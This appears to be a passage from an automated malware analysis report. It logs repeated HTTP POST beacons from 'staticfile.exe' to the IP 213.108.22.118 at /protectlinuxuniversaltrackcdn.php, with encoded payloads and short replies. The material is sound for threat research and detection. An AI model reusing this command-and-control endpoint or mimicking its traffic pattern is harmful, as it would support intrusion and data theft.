                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:48.466240883 CET2544OUTData Raw: 50 5d 5c 59 50 5e 50 5e 55 5c 57 59 50 59 5a 5c 58 5d 5b 5c 51 5c 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P]\YP^P^U\WYPYZ\X][\Q\S]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C*>) 28/?<20W%=+^=5Z#"0[$2&:._/%^/(


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        42192.168.2.449830213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:49.181644917 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:49.529067993 CET1428OUTData Raw: 50 5b 59 5c 55 5b 50 51 55 5c 57 59 50 5d 5a 56 58 55 5b 5c 51 58 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P[Y\U[PQU\WYP]ZVXU[\QXS\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"*.6\#"8]2(8?#S2](T0>("/!$.#\1:Y.._/%^/8
                                        Nov 30, 2024 22:36:50.834728003 CET405INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 36 3a 35 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 03 11 20 06 3f 16 2e 10 2b 06 26 02 2c 3f 27 09 26 38 03 10 2d 3e 2e 01 3c 2a 1b 59 29 2c 3d 1e 36 2b 33 5c 28 17 0c 52 27 50 3e 5b 2b 01 2b 5e 0c 1b 23 1a 28 05 2a 01 27 02 34 5d 30 30 30 5f 20 31 0d 59 26 3d 2d 0a 2b 38 26 1a 23 21 26 19 3b 0b 29 57 26 17 38 11 2a 11 0d 57 36 39 2f 56 0b 12 22 56 27 32 0f 59 24 3c 27 01 37 1e [TRUNCATED]
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:36:50 GMTServer: Apache/2.4.41 (Ubuntu)Vary: Accept-EncodingContent-Length: 152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8 ?.+&,?'&8->.<*Y),=6+3\(R'P>[++^#(*'4]000_ 1Y&=-+8&#!&;)W&8*W69/V"V'2Y$<'7._!6 ?-U!;>[)=&[438*=&(==/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        43192.168.2.449831213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:49.307431936 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:49.653723001 CET2544OUTData Raw: 55 5c 59 5a 55 59 50 5d 55 5c 57 59 50 5d 5a 5d 58 5d 5b 58 51 5b 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\YZUYP]U\WYP]Z]X][XQ[STU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(.%#!+2 ^,02 V3> )%+\7<!R&-7\%.:4._/%^/8
                                        Nov 30, 2024 22:36:50.678457022 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:50.922574997 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:50 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        44192.168.2.449836213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:51.472342014 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:51.825623035 CET2544OUTData Raw: 55 5f 5c 5e 55 5d 50 5a 55 5c 57 59 50 5a 5a 56 58 55 5b 53 51 5c 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U_\^U]PZU\WYPZZVXU[SQ\S]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"<2\ 41>^8< $;$R37)/\ :3.81*X:4._/%^/$
                                        Nov 30, 2024 22:36:52.874078989 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:53.128180981 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:52 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        45192.168.2.449841213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:53.367594957 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:53.716379881 CET2536OUTData Raw: 55 59 59 5c 55 5f 50 5f 55 5c 57 59 50 5b 5a 5d 58 5f 5b 5b 51 5b 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UYY\U_P_U\WYP[Z]X_[[Q[SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+.*#2%/Z?W2'.8>/]40+^10"X.$._/%^/
                                        Nov 30, 2024 22:36:54.756412029 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:54.998539925 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:54 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        46192.168.2.449847213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:55.252125978 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:55.606905937 CET2544OUTData Raw: 55 50 59 5b 55 5d 50 58 55 5c 57 59 50 52 5a 53 58 54 5b 53 51 5e 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UPY[U]PXU\WYPRZSXT[SQ^SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+>2^4Y2_/?$(8W$>'(&3\"?=3^%0:[,$._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        47192.168.2.449848213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:55.962694883 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:56.310029984 CET1428OUTData Raw: 55 51 5c 5f 50 58 55 5b 55 5c 57 59 50 5d 5a 52 58 5d 5b 5a 51 59 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQ\_PXU[U\WYP]ZRX][ZQYSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D(-.!"0278<1+%=8*Z4?)R0;]2U*Z9$._/%^/8
                                        Nov 30, 2024 22:36:57.382005930 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:57.636152029 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:57 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 04 28 06 21 01 28 5e 31 59 2d 06 24 13 32 06 31 12 2f 3d 39 16 29 3a 25 5a 3d 2c 25 10 36 38 2f 59 3f 29 00 54 24 50 3e 11 3c 01 2b 5e 0c 1b 20 41 2b 28 2d 5f 30 15 0d 04 30 20 02 58 20 31 3f 13 30 3e 25 0b 3f 2b 26 5c 20 21 3d 0b 2f 22 35 1e 25 17 3c 5f 2a 11 2b 56 36 03 2f 56 0b 12 22 14 27 22 00 03 24 3f 3b 01 20 23 2e 58 23 36 32 1f 20 3f 04 0f 21 5e 3a 10 2b 10 26 1c 34 30 20 51 2a 2e 2e 02 31 22 23 52 3e 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: (!(^1Y-$21/=9):%Z=,%68/Y?)T$P><+^ A+(-_00 X 1?0>%?+&\ !=/"5%<_*+V6/V"'"$?; #.X#62 ?!^:+&40 Q*..1"#R>=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        48192.168.2.449850213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:56.083976030 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:56.435024977 CET2544OUTData Raw: 55 5b 59 5b 55 5d 50 51 55 5c 57 59 50 5c 5a 53 58 55 5b 5b 51 5b 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[Y[U]PQU\WYP\ZSXU[[Q[S^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B+*77&X;,Z?V%]+3>C?Z ='-7\26Y:._/%^/
                                        Nov 30, 2024 22:36:57.434160948 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:57.669612885 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:57 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        49192.168.2.449855213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:57.918858051 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:58.263199091 CET2536OUTData Raw: 55 50 59 5e 50 5a 50 59 55 5c 57 59 50 5b 5a 5d 58 5b 5b 5a 51 5f 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UPY^PZPYU\WYP[Z]X[[ZQ_SZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(&X#"$&+8<$2;3>?>; "'1#99$._/%^/
                                        Nov 30, 2024 22:36:59.332590103 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:00.344515085 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:59 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        50192.168.2.449862213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:00.666230917 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:01.013468981 CET2544OUTData Raw: 55 5c 5c 59 50 58 55 5a 55 5c 57 59 50 5e 5a 57 58 54 5b 5f 51 5c 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\\YPXUZU\WYP^ZWXT[_Q\S]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!?-9 (\&7/(%;#%=?=604<:&=;%9.$._/%^/4
                                        Nov 30, 2024 22:37:02.050306082 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:02.294730902 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:01 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        51192.168.2.449867213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:02.545701981 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        52192.168.2.449868213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:02.761454105 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:03.109597921 CET1428OUTData Raw: 55 5b 59 5f 55 5a 55 5b 55 5c 57 59 50 5a 5a 51 58 54 5b 5c 51 59 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[Y_UZU[U\WYPZZQXT[\QYS\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!A+>9 2_$.8,#U&]$V3[$)684<9R$']1:^9._/%^/$
                                        Nov 30, 2024 22:37:07.225490093 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:07.466890097 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:06 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 04 2b 28 2a 5b 3f 06 22 02 2d 3f 38 51 31 2b 39 10 2c 2d 35 5d 2b 5c 39 5e 3e 05 2d 57 36 38 33 1f 3c 39 26 52 27 35 3e 5b 28 01 2b 5e 0c 1b 23 1c 3e 2b 3d 59 33 2b 28 15 30 30 20 5b 22 32 2b 5a 27 03 26 1f 3f 01 3a 1a 20 0f 26 52 38 31 25 54 26 39 27 07 2a 2c 2b 52 36 39 2f 56 0b 12 22 56 26 31 22 06 24 3c 3c 10 34 20 2e 58 21 26 0f 03 21 3f 26 0d 36 38 3a 1f 2b 3e 08 59 20 1d 02 51 3d 2d 3a 02 25 22 27 55 29 2d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: +(*[?"-?8Q1+9,-5]+\9^>-W683<9&R'5>[(+^#>+=Y3+(00 ["2+Z'&?: &R81%T&9'*,+R69/V"V&1"$<<4 .X!&!?&68:+>Y Q=-:%"'U)-/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        53192.168.2.449869213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:02.938010931 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:03.294687033 CET2544OUTData Raw: 55 5a 5c 5d 55 5a 55 5d 55 5c 57 59 50 52 5a 53 58 5e 5b 5f 51 5c 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZ\]UZU]U\WYPRZSX^[_Q\SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+X2#2^&>8Z,<71( 3'Z=?7/:&=7%0).4._/%^/
                                        Nov 30, 2024 22:37:04.404500008 CET232INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 37 3a 30 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 31 59 5a 51
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:37:03 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        54192.168.2.449875213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:04.658520937 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:05.013233900 CET2544OUTData Raw: 55 5a 59 55 55 5e 55 58 55 5c 57 59 50 52 5a 50 58 5c 5b 59 51 50 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
